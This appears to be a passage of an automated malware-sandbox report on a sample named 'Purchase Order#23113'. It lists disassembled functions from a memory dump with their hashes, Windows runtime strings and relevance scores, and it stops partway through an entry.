                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: #%u
                                                                            • API String ID: 48624451-232158463
                                                                            • Opcode ID: 61979af25224719be0c2e9361d7f52eeb5c59335c7049c48786d743ccac6cf5f
                                                                            • Instruction ID: c8974549364d99d311369286c892d7ab98c58010af7e543bb307fd5768cc8548
                                                                            • Opcode Fuzzy Hash: 61979af25224719be0c2e9361d7f52eeb5c59335c7049c48786d743ccac6cf5f
                                                                            • Instruction Fuzzy Hash: EA714771A0014A9FDB01DFA8D994FAEBBF8BF08704F144065EA05E7255EB34EE45CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0173A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrResSearchResource Enter, xrefs: 0173AA13
                                                                            • LdrResSearchResource Exit, xrefs: 0173AA25
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                            • API String ID: 0-4066393604
                                                                            • Opcode ID: a3615412cb57829f73e13e8fa0d1c8fb2e4a5a3348af7602ee40fb89bb12ad1a
                                                                            • Instruction ID: 664489243a321e02717a8daffab9262bda267ecc94eb917b5a51e49cafaef7b3
                                                                            • Opcode Fuzzy Hash: a3615412cb57829f73e13e8fa0d1c8fb2e4a5a3348af7602ee40fb89bb12ad1a
                                                                            • Instruction Fuzzy Hash: 06E1A271E00209AFEF26DFA8D985BAEFBBAFF94310F100469E941E7252D7349945CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `$`
                                                                            • API String ID: 0-197956300
                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                            • Instruction ID: 47a455d474e48fc495d3d3e464a42f52781150a3e6b3c7e5acf3cc0012cdff5b
                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                            • Instruction Fuzzy Hash: DCC1AC312043429BEB25CF28C845B6BFBE5AFD4318F184A2DF69A8B391D774D505CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Legacy$UEFI
                                                                            • API String ID: 2994545307-634100481
                                                                            • Opcode ID: 1e7cd33eae56e23a2d6d3b27070ca39c5cf8c157aa163a7b4ee116b4b86e9e60
                                                                            • Instruction ID: cc74388a43568bc3274a701ab56032ad523567ca544333135db1229e2a69f2f7
                                                                            • Opcode Fuzzy Hash: 1e7cd33eae56e23a2d6d3b27070ca39c5cf8c157aa163a7b4ee116b4b86e9e60
                                                                            • Instruction Fuzzy Hash: E0616C71E403099FDB15DFA8C880BADFBB5FB88700F94416DE649EB291DB31A940CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017D43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$MUI
                                                                            • API String ID: 0-17815947
                                                                            • Opcode ID: 6e62c20c18bfe6788a6f69959ccca86f420b5c5da5e85db6eab7d574e6f2055b
                                                                            • Instruction ID: 23551c9b215801fbeae07a0cb64ec8dda8d517525edec183ace09fc6dfbf1917
                                                                            • Opcode Fuzzy Hash: 6e62c20c18bfe6788a6f69959ccca86f420b5c5da5e85db6eab7d574e6f2055b
                                                                            • Instruction Fuzzy Hash: 82511671E0021DAEDF11DFA9CC84AEEFBB9EB44754F100529EA12A7691D7309A45CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0173063D
                                                                            • kLsE, xrefs: 01730540
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                            • API String ID: 0-2547482624
                                                                            • Opcode ID: 9194c7220f2c715bd620de85860a49d66fd70cf6d00794c449dc2370aca40808
                                                                            • Instruction ID: 925d3c4258a1115b4f2cac76fa5e6e016425c75406ea8fc8e4ba842335c61ab0
                                                                            • Opcode Fuzzy Hash: 9194c7220f2c715bd620de85860a49d66fd70cf6d00794c449dc2370aca40808
                                                                            • Instruction Fuzzy Hash: D9518D71504742CFD725DF68C544AA7FBE4AFC4304F20883EFAAA87286E7709545CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0173A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0173A2FB
                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0173A309
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                            • API String ID: 0-2876891731
                                                                            • Opcode ID: 2961fee78710ec4f6b442b983a91facbf4368796d0c458d95690eed551b022d5
                                                                            • Instruction ID: 9ad592bc23bf515a950679db2fe9e1d2eaad9921acba566e08de4a9dcceaf8f8
                                                                            • Opcode Fuzzy Hash: 2961fee78710ec4f6b442b983a91facbf4368796d0c458d95690eed551b022d5
                                                                            • Instruction Fuzzy Hash: E341DF30A04659EBDB12DF59D885BAEFBF4FF84700F2440A9E944DB2A2E3B5D940CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0176A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Cleanup Group$Threadpool!
                                                                            • API String ID: 2994545307-4008356553
                                                                            • Opcode ID: e8660e0640eeb34ce4fcc688838d023b2d39fdf112347bb5a337e8be003d47c4
                                                                            • Instruction ID: 94d41e256acf1e9f9d52e64fe8c22cc2f5bb97c94cfcb3b8883115cab71ff924
                                                                            • Opcode Fuzzy Hash: e8660e0640eeb34ce4fcc688838d023b2d39fdf112347bb5a337e8be003d47c4
                                                                            • Instruction Fuzzy Hash: 1E01DCB2250740AFD322DF24CD49B26B7E8EB84B25F018939AA58D7190E334E908CB46
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0173C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: MUI
                                                                            • API String ID: 0-1339004836
                                                                            • Opcode ID: 8bde832d3124899d8f827d4b9ce860dfe92d2d2cd1ef45ab9ae92c0f262c9c89
                                                                            • Instruction ID: 98e2bc9877f4157735fba3fe4603c05c2519842918f8e03eb5a55f7c98dfa7a6
                                                                            • Opcode Fuzzy Hash: 8bde832d3124899d8f827d4b9ce860dfe92d2d2cd1ef45ab9ae92c0f262c9c89
                                                                            • Instruction Fuzzy Hash: 9F827C75E002198FEB25CFA9C884BEDFBB5BF88710F14816AE959AB352D7309D41CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017B6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 113d4a2981c32de9849bc781cee997c74d795d33cb72ee5497a50c1c5f7bc3b6
                                                                            • Instruction ID: 942240f5964a0452fd7ccb9bb6818450776fa06c6d4d50ba8c45dfdc091eb0b8
                                                                            • Opcode Fuzzy Hash: 113d4a2981c32de9849bc781cee997c74d795d33cb72ee5497a50c1c5f7bc3b6
                                                                            • Instruction Fuzzy Hash: 5A913F72941219ABEB21DF95CD85FEEBBB8EF18B50F104065F700AB195D774AD04CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017DE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 5e79269e68db5268452013829e9125aae4bf38d28ab90950f0b3d8d533c7197a
                                                                            • Instruction ID: 579935b48517fdfd5a111b931667b8c75318285529d44f2d30c3bb5e3c0aac9c
                                                                            • Opcode Fuzzy Hash: 5e79269e68db5268452013829e9125aae4bf38d28ab90950f0b3d8d533c7197a
                                                                            • Instruction Fuzzy Hash: 9E918E31A00609ABDB23AFA5DC88FAFFB79EF45750F100029F505AB250EF75A901DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0176A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: GlobalTags
                                                                            • API String ID: 0-1106856819
                                                                            • Opcode ID: a3d8d5d5756939a59cfd8eaec647d25f88b803cfa28ecf9864ea4fb24a4a95d2
                                                                            • Instruction ID: 665d713f20599f96e972237f07e1443a89caf70a62e6af5de185d90970532102
                                                                            • Opcode Fuzzy Hash: a3d8d5d5756939a59cfd8eaec647d25f88b803cfa28ecf9864ea4fb24a4a95d2
                                                                            • Instruction Fuzzy Hash: 1E717DB5E0021ACFDF29CF9CC590AADFBB5BF88710F58826AF905A7245E7319941CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017D4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .mui
                                                                            • API String ID: 0-1199573805
                                                                            • Opcode ID: a176b7c2b2ce7ac7cac99c1bbee013052980787071c44e337fc876ca2239bc2d
                                                                            • Instruction ID: a8701577e8ff937f3d86d846a4dc3bb80392304b95da049739231a5725e2672d
                                                                            • Opcode Fuzzy Hash: a176b7c2b2ce7ac7cac99c1bbee013052980787071c44e337fc876ca2239bc2d
                                                                            • Instruction Fuzzy Hash: 1251B072D0022E9BDF11DF99C844AAEFBB4AF58A40F05416AEA12BB654D7348D01CFE5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0174E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: EXT-
                                                                            • API String ID: 0-1948896318
                                                                            • Opcode ID: d4add4909608cd53a2a70f2a60a37cb20b66614ad89e1837173f6e63e80192e8
                                                                            • Instruction ID: 0e951e7a80d8fd499501ddbcedfa983ec852557af33c88c05e9ae6665bfda8e7
                                                                            • Opcode Fuzzy Hash: d4add4909608cd53a2a70f2a60a37cb20b66614ad89e1837173f6e63e80192e8
                                                                            • Instruction Fuzzy Hash: 3F4160725083129BD712DB79C884B6BF7D8BF88724F44096DF684D7180EB78D904C796
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryHash
                                                                            • API String ID: 0-2202222882
                                                                            • Opcode ID: 1ac719cfb79e52d52f37821250bc5fdb4f7242cea298057c6704217816931208
                                                                            • Instruction ID: 261303606a7ea779116a457aadbd4d6e4a2e21837db19edacb768875f5fe2dc3
                                                                            • Opcode Fuzzy Hash: 1ac719cfb79e52d52f37821250bc5fdb4f7242cea298057c6704217816931208
                                                                            • Instruction Fuzzy Hash: BA4142B1D4112DAADF22DB50CC84FDEF77CAB44724F4046A5EB18AB144DB709E898FA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017C6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #
                                                                            • API String ID: 0-1885708031
                                                                            • Opcode ID: aea5ae35cd8c6de1448e2d00764fb17fe4a3be0add2e5846b203fd20dce003e7
                                                                            • Instruction ID: 5aea71e3ab0ceede9b28aae0797e0be0c0c445a83b513b4a927168ba590fb352
                                                                            • Opcode Fuzzy Hash: aea5ae35cd8c6de1448e2d00764fb17fe4a3be0add2e5846b203fd20dce003e7
                                                                            • Instruction Fuzzy Hash: 8831E531A006199BEB32DF69C894BEEFBA8DF05B04F14406CF951AB382D775E905CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017ACA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryName
                                                                            • API String ID: 0-215506332
                                                                            • Opcode ID: 5e9fd23d939ee0d2690a42bc5caf7d91e886ec5d216678d11ec3c88e15b1c075
                                                                            • Instruction ID: 6abd71c51b76ae5f4d8a649d0693ea794fa8b57bbf2cfca12c060473c0ba101f
                                                                            • Opcode Fuzzy Hash: 5e9fd23d939ee0d2690a42bc5caf7d91e886ec5d216678d11ec3c88e15b1c075
                                                                            • Instruction Fuzzy Hash: 07310336900519BFEB16DB58C855EBFFB74EBC0720F414269AA15AB250D7319E00EBE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017B892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017B895E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                            • API String ID: 0-702105204
                                                                            • Opcode ID: 8e5acaa86775fb618eeadd03925d3d3546774a8fbec4fd02e72ab1d526e44683
                                                                            • Instruction ID: a135b3295bc0dc0815c63719655cd4f293c75b9d6a13664355e7d068826dcb57
                                                                            • Opcode Fuzzy Hash: 8e5acaa86775fb618eeadd03925d3d3546774a8fbec4fd02e72ab1d526e44683
                                                                            • Instruction Fuzzy Hash: 9501F7712402219BEB325E59C8C8BE6FB69EF82794B04001DF7814A155CB20A881CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017D2000 Relevance: .8, Instructions: 757COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 24f2d03c8bbf73275ea39cf4687256d1e031739f28e054620fc31f9765eed83f
                                                                            • Instruction ID: 933612857a54bab6abedf9cf276b4ef744cdf47fb5c2cc379f091f905bda20ea
                                                                            • Opcode Fuzzy Hash: 24f2d03c8bbf73275ea39cf4687256d1e031739f28e054620fc31f9765eed83f
                                                                            • Instruction Fuzzy Hash: 6942E2326083499FD725CF68C891A6BFBF5BF88300F08492DFA9697252D771D846CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017C8158 Relevance: .6, Instructions: 617COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c9174d14a469ad3d3ed48350a9e67d06d3d317c07cd54a7c365d4841cc2bb5ee
                                                                            • Instruction ID: 7c2d4208465756154ffba641a623bc35bb6bc098b5a735504c9b35fafb055755
                                                                            • Opcode Fuzzy Hash: c9174d14a469ad3d3ed48350a9e67d06d3d317c07cd54a7c365d4841cc2bb5ee
                                                                            • Instruction Fuzzy Hash: 0D425C75A002199FEB25CF69C881BADFBF5BF48700F18819DE949EB242D7349981CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01742840 Relevance: .6, Instructions: 605COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e5e766ebfddd0a1534338ee0207437e50cd48f452edaa7da3e2d7dfc5c11ecc4
                                                                            • Instruction ID: 66589c169c8727a77f82b721fc62b30e085d59e9649f6ec9bcd76af6eb6b88f4
                                                                            • Opcode Fuzzy Hash: e5e766ebfddd0a1534338ee0207437e50cd48f452edaa7da3e2d7dfc5c11ecc4
                                                                            • Instruction Fuzzy Hash: F932DE70A007558BEF25CF69D848BBEFBF2BF84304F24421DE5869B285D735A949CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017DA118 Relevance: .6, Instructions: 591COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 549d65f22a02044a1985e64a04e14181249f77c8eb7b668ab6333b4c5ee16210
                                                                            • Instruction ID: dadd1cba5cd9cda1057b21abe9409ff4e1e65967dff9250845d7b9a5c47c31a1
                                                                            • Opcode Fuzzy Hash: 549d65f22a02044a1985e64a04e14181249f77c8eb7b668ab6333b4c5ee16210
                                                                            • Instruction Fuzzy Hash: 7122CD70204669CBEB25CF2DC094772FBF1BF44300F18849AE9968F286E775E592CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01736A50 Relevance: .5, Instructions: 548COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 186ccf1a6d91dd0cf48b0e53a8f456a705665e57688e81da2478aa8ce23e0f71
                                                                            • Instruction ID: 09fc6ce793976412a8862f138d6b48b43557d3484786f28b51246b7e2cf195cf
                                                                            • Opcode Fuzzy Hash: 186ccf1a6d91dd0cf48b0e53a8f456a705665e57688e81da2478aa8ce23e0f71
                                                                            • Instruction Fuzzy Hash: 0132AD71A04205DFDB25CF68D880BAAFBF1FF88310F2485A9E955AB392D730E955CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01754A35 Relevance: .4, Instructions: 423COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                            • Instruction ID: 11197c980730d2b751b00dd656881e645f8f4769a2f60e2f12b7dee701890515
                                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                            • Instruction Fuzzy Hash: 63F16F71E0021A9BDF55CFA9D584BAEFBF5AF48710F048169ED06AB344E7B4D881CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017C892B Relevance: .4, Instructions: 386COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e6fe770e43500436b7e8e1c6c2788561f72e05e20e75e724ba645ca5b7ae0f55
                                                                            • Instruction ID: 5954953d70328224d2e1d7e7338d3eb90d1b690e208bafc1b7672f095ebf36b6
                                                                            • Opcode Fuzzy Hash: e6fe770e43500436b7e8e1c6c2788561f72e05e20e75e724ba645ca5b7ae0f55
                                                                            • Instruction Fuzzy Hash: C6D1F071A0061A9BDF15CF68C841BFEF7F1AF88B04F1881AED955A7241E735EA01CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017365D0 Relevance: .4, Instructions: 383COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 37a044da7f0c6a1b5206bf75f25ad43d1a31374cba0f675be01eef452c0d78bd
                                                                            • Instruction ID: 2c1cd8610147619a6a187d9a0a7e2ad03f0f7378f30f14f90252e35bee38b990
                                                                            • Opcode Fuzzy Hash: 37a044da7f0c6a1b5206bf75f25ad43d1a31374cba0f675be01eef452c0d78bd
                                                                            • Instruction Fuzzy Hash: ABE16971608342DFC715CF28C094A6AFBE0BF89314F55896DF99987352EB31EA05CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01728397 Relevance: .4, Instructions: 380COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3033275775d94159b1d8db0df20ca384b60dd5c8d236175385579ab813142733
                                                                            • Instruction ID: a357379d289031f00c828a804af09275a0fee60b74d20b2201f5473b7246aa27
                                                                            • Opcode Fuzzy Hash: 3033275775d94159b1d8db0df20ca384b60dd5c8d236175385579ab813142733
                                                                            • Instruction Fuzzy Hash: C4D12471B402268BCB14DF69C880ABAF7F1FF54308F14422DE912DB281E735EA52CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017B8243 Relevance: .3, Instructions: 322COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                            • Instruction ID: 878f6c99cafdf162594425a73908b1746ce8101904812e4e2c01fbb9bb1503d4
                                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
